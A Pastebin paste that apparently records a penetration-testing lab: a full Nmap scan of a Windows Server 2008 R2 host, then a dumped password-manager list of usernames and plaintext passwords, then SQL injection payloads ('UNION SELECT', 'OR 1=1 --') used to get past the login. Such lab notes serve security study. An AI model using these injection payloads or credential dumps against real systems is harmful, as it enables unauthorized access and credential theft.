Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Nmap scan report for 192.168.32.53
- Host is up (0.16s latency).
- Not shown: 65513 filtered ports
- PORT STATE SERVICE VERSION
- 21/tcp open ftp?
- 23/tcp open telnet Microsoft Windows XP telnetd
- | telnet-ntlm-info:
- | Target_Name: LOOKAROUNDYOU
- | NetBIOS_Domain_Name: LOOKAROUNDYOU
- | NetBIOS_Computer_Name: LOOKAROUNDYOU
- | DNS_Domain_Name: LookAroundYou
- | DNS_Computer_Name: LookAroundYou
- |_ Product_Version: 6.1.7600
- 53/tcp open domain Microsoft DNS 6.1.7600
- | dns-nsid:
- |_ bind.version: Microsoft DNS 6.1.7600 (1DB04228)
- 111/tcp open rpcbind 2-4 (RPC #100000)
- | rpcinfo:
- | program version port/proto service
- | 100000 2,3,4 111/tcp rpcbind
- | 100000 2,3,4 111/udp rpcbind
- | 100003 2,3 2049/tcp nfs
- | 100003 2,3 2049/udp nfs
- | 100005 1,2,3 1048/tcp mountd
- | 100005 1,2,3 1048/udp mountd
- | 100021 1,2,3,4 1047/tcp nlockmgr
- | 100021 1,2,3,4 1047/udp nlockmgr
- | 100024 1 1039/tcp status
- |_ 100024 1 1039/udp status
- 135/tcp open msrpc Microsoft Windows RPC
- 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
- 445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7600 microsoft-ds
- 1039/tcp open status 1 (RPC #100024)
- 1047/tcp open nlockmgr 1-4 (RPC #100021)
- 1048/tcp open mountd 1-3 (RPC #100005)
- 2049/tcp open nfs 2-3 (RPC #100003)
- 3389/tcp open ms-wbt-server Microsoft Terminal Service
- | ssl-cert: Subject: commonName=LookAroundYou
- | Issuer: commonName=LookAroundYou
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha1WithRSAEncryption
- | Not valid before: 2016-01-01T01:14:06
- | Not valid after: 2016-07-02T01:14:06
- | MD5: 64a8 79d7 4642 23e2 703c 54b6 35a2 0b61
- |_SHA-1: ef92 3a34 5132 ec48 d90f aeb5 405a e42c 78cd 6600
- |_ssl-date: 2016-01-02T01:18:50+00:00; -224d08h35m12s from scanner time.
- 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
- |_http-server-header: Microsoft-HTTPAPI/2.0
- |_http-title: Not Found
- 8080/tcp open http Microsoft IIS httpd 7.5
- | http-methods:
- | Supported Methods: OPTIONS TRACE GET HEAD POST
- |_ Potentially risky methods: TRACE
- |_http-server-header: Microsoft-IIS/7.5
- |_http-title: Site doesn't have a title (text/html; charset=utf-8).
- 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
- |_http-server-header: Microsoft-HTTPAPI/2.0
- |_http-title: Not Found
- 49152/tcp open msrpc Microsoft Windows RPC
- 49153/tcp open msrpc Microsoft Windows RPC
- 49154/tcp open msrpc Microsoft Windows RPC
- 49155/tcp open msrpc Microsoft Windows RPC
- 49172/tcp open msrpc Microsoft Windows RPC
- 49173/tcp open msrpc Microsoft Windows RPC
- 49175/tcp open msrpc Microsoft Windows RPC
- 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
- SF-Port21-TCP:V=7.25BETA1%I=7%D=8/13%Time=57AEED8F%P=i686-pc-linux-gnu%r(N
- SF:ULL,B,"220\x20Hello\r\n")%r(GenericLines,5B,"220\x20Hello\r\n500-'\r\n5
- SF:00\x20\x20':\x20command\x20not\x20understood\.\r\n500-'\r\n500\x20\x20'
- SF::\x20command\x20not\x20understood\.\r\n")%r(Help,2B0,"220\x20Hello\r\n2
- SF:14-The\x20following\x20commands\x20are\x20recognized\x20\(\*\x20==>'s\x
- SF:20unimplemented\)\.\r\n\x20\x20\x20\x20ABOR\x20\r\n\x20\x20\x20\x20ACCT
- SF:\x20\r\n\x20\x20\x20\x20ADAT\x20\*\r\n\x20\x20\x20\x20ALLO\x20\r\n\x20\
- SF:x20\x20\x20APPE\x20\r\n\x20\x20\x20\x20AUTH\x20\r\n\x20\x20\x20\x20CCC\
- SF:x20\r\n\x20\x20\x20\x20CDUP\x20\r\n\x20\x20\x20\x20CWD\x20\r\n\x20\x20\
- SF:x20\x20DELE\x20\r\n\x20\x20\x20\x20ENC\x20\*\r\n\x20\x20\x20\x20EPRT\x2
- SF:0\r\n\x20\x20\x20\x20EPSV\x20\r\n\x20\x20\x20\x20FEAT\x20\r\n\x20\x20\x
- SF:20\x20HELP\x20\r\n\x20\x20\x20\x20HOST\x20\r\n\x20\x20\x20\x20LANG\x20\
- SF:r\n\x20\x20\x20\x20LIST\x20\r\n\x20\x20\x20\x20MDTM\x20\r\n\x20\x20\x20
- SF:\x20MIC\x20\*\r\n\x20\x20\x20\x20MKD\x20\r\n\x20\x20\x20\x20MODE\x20\r\
- SF:n\x20\x20\x20\x20NLST\x20\r\n\x20\x20\x20\x20NOOP\x20\r\n\x20\x20\x20\x
- SF:20OPTS\x20\r\n\x20\x20\x20\x20PASS\x20\r\n\x20\x20\x20\x20PASV\x20\r\n\
- SF:x20\x20\x20\x20PBSZ\x20\r\n\x20\x20\x20\x20PORT\x20\r\n\x20\x20\x20\x20
- SF:PROT\x20\r\n\x20\x20\x20\x20PWD\x20\r\n\x20\x20\x20\x20QUIT\x20\r\n\x20
- SF:\x20\x20\x20REIN\x20\r\n\x20\x20\x20\x20REST\x20\r\n\x20\x20\x20\x20RET
- SF:R\x20\r\n\x20\x20\x20\x20RMD\x20\r\n\x20\x20\x20\x20RNFR\x20\r\n\x20\x2
- SF:0\x20\x20RNTO\x20\r\n\x20\x20\x20\x20SITE\x20\r\n\x20\x20\x20\x20SIZE\x
- SF:20\r\n\x20\x20\x20\x20SMNT\x20\r\n\x20\x20\x20\x20STAT\x20\r\n\x20\x20\
- SF:x20\x20STOR\x20\r\n\x20\x20\x20\x20STOU\x20\r\n\x20\x20\x20\x20STRU\x20
- SF:\r\n\x20\x20\x20\x20SYST\x20\r\n\x20\x20\x20\x20TYPE\x20\r\n\x20\x20\x2
- SF:0\x20USER\x20\r\n\x20\x20\x20\x20XCUP\x20\r\n\x20\x20\x20\x20XCWD\x20\r
- SF:\n\x20\x20\x20\x20XMKD\x20\r\n\x20\x20\x20\x20XPWD\x20\r\n\x20\x20\x20\
- SF:x20XRMD\x20\r\n214\x20HELP\x20command\x20successful\.\r\n")%r(GetReques
- SF:t,62,"220\x20Hello\r\n500\x20'GET\x20/\x20HTTP/1\.0':\x20command\x20not
- SF:\x20understood\.\r\n500-'\r\n500\x20\x20':\x20command\x20not\x20underst
- SF:ood\.\r\n")%r(HTTPOptions,66,"220\x20Hello\r\n500\x20'OPTIONS\x20/\x20H
- SF:TTP/1\.0':\x20command\x20not\x20understood\.\r\n500-'\r\n500\x20\x20':\
- SF:x20command\x20not\x20understood\.\r\n");
- MAC Address: 00:50:56:89:0D:EF (VMware)
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose|phone|specialized
- Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|8.1|7|Vista|2012 (92%)
- OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
- Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Microsoft Windows Vista SP2 (91%)
- No exact OS matches for host (test conditions non-ideal).
- Uptime guess: 0.045 days (since Sat Aug 13 11:49:09 2016)
- Network Distance: 1 hop
- TCP Sequence Prediction: Difficulty=261 (Good luck!)
- IP ID Sequence Generation: Incremental
- Service Info: OSs: Windows XP, Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows_xp, cpe:/o:microsoft:windows
- Host script results:
- | ms-sql-info:
- | Windows server name: LOOKAROUNDYOU
- | 192.168.32.53\SQLEXPRESS:
- | Instance name: SQLEXPRESS
- | Version:
- | Service pack level: SP3
- | Product: Microsoft SQL Server 2008 R2
- | name: Microsoft SQL Server 2008 R2 SP3
- |_ Clustered: false
- | nbstat: NetBIOS name: LOOKAROUNDYOU, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:89:0d:ef (VMware)
- | Names:
- | LOOKAROUNDYOU<00> Flags: <unique><active>
- | THINC.LOCAL<00> Flags: <group><active>
- |_ LOOKAROUNDYOU<20> Flags: <unique><active>
- | smb-os-discovery:
- | OS: Windows Server 2008 R2 Standard 7600 (Windows Server 2008 R2 Standard 6.1)
- | OS CPE: cpe:/o:microsoft:windows_server_2008::-
- | Computer name: LookAroundYou
- | NetBIOS computer name: LOOKAROUNDYOU
- | Workgroup: THINC.LOCAL
- |_ System time: 2016-01-02T01:18:49+00:00
- | smb-security-mode:
- | account_used: guest
- | authentication_level: user
- | challenge_response: supported
- |_ message_signing: disabled (dangerous, but default)
- |_smbv2-enabled: Server supports SMBv2 protocol
- TRACEROUTE
- HOP RTT ADDRESS
- 1 159.80 ms 192.168.32.53
- Logged In!
- Welcome to LookAroundYou's (custom homemade) Password Manager. It's work in progress, so don't expect EVERYTHING to be working correctly.
- ID: 1
- Username: bob
- Password: guesswhoisback
- ID: 2
- Username: admin
- Password: 10293847561029
- ID: 3
- Username: noah
- Password:
- ID: 4
- Username: rob
- Password: password1
- admin' AND 0=1 UNION SELECT null,null,null,null --
- SELECT * FROM XXX
- SELECT ID, Username, Password from
- SELECT * FROM WHERE Username = '$usr' AND Password = '$pass'
- SELECT * FROM WHERE Username = 'admin' OR 1=1 --$usr ' AND Password = '$pass'
Add Comment
Please, Sign In to add comment